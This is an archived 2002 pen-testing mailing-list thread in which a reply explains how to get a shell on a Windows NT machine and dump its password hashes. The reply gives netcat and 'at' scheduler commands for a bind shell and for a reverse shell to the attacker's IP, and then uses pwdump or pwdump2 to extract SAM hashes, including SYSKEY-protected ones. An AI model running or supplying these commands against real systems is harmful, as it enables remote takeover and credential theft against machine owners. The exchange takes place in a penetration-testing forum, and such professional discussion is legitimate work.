RE: Access to a win NT box
From: Panos Dimitriou (p.dimitriou@encode-sec.com)Date: 06/26/02
- Previous message: fotos@softhome.net: "pen-testing an Oracle9i Application Server"
- In reply to: Pedro Miranda: "Access to a win NT box"
- Next in thread: Mark Maher: "RE: Access to a win NT box"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Panos Dimitriou" <p.dimitriou@encode-sec.com> To: "'Pedro Miranda'" <rpmiranda@sonae.pt>, <pen-test@securityfocus.com> Date: Wed, 26 Jun 2002 19:23:10 +0300
You can always upload any tool you like, such as pwdump, and then you
just have to execute it. In order to execute it you can:
1. upload netcat (nc.exe)
2. execute "net time \\target"
3. schedule a job like:
at \\target 7:14P ""c:\nc.exe -L -p 2222 -e cmd.exe and then establish a
connection (with netcat preferably) to port 2222
or, if the system is firewalled
at \\target 7:14P ""c:\nc.exe [your IP] 80 -e cmd.exe and have a netcat
listening on port 80 (nc -L -p 80)in order to establish a reverse shell.
After gaining a shell on the system execute pwdump and download the
results. Furthermore, if you use pwdump2 you can extract the passwords
even if the SAM is SYSKEY protected.
I hope this helped
________________________
Panos Dimitriou
Director, Managed Security Services
_________________________
ENCODE S.A.
3, R. Melodou str.
151 25 Marousi
Athens, Greece
_________________________
E Tel.: +30 (1) 6178410
E Fax.: +30 (1) 6109579
s p.dimitriou@encode-sec.com
" www.encode-sec.com
_________________________
-----Original Message-----
From: Pedro Miranda [mailto:rpmiranda@sonae.pt]
Sent: Tuesday, June 25, 2002 7:43 PM
To: pen-test@securityfocus.com
Subject: Access to a win NT box
Hi, I've got remote access to a wNT box using the command
\\machinename\c$ /user:machinename\administrator
So i've got administrator privileges but i want to access to the SAM
database.
I've tried to get \\winnt\repair\sam._ but i couldn't find the rdisk
comand.
Can anybody help tell me where can i find this software, or if there is
another way to get access to the sam file.
Thanks in advance
------------------------------------------------------------------------
---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
- Previous message: fotos@softhome.net: "pen-testing an Oracle9i Application Server"
- In reply to: Pedro Miranda: "Access to a win NT box"
- Next in thread: Mark Maher: "RE: Access to a win NT box"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
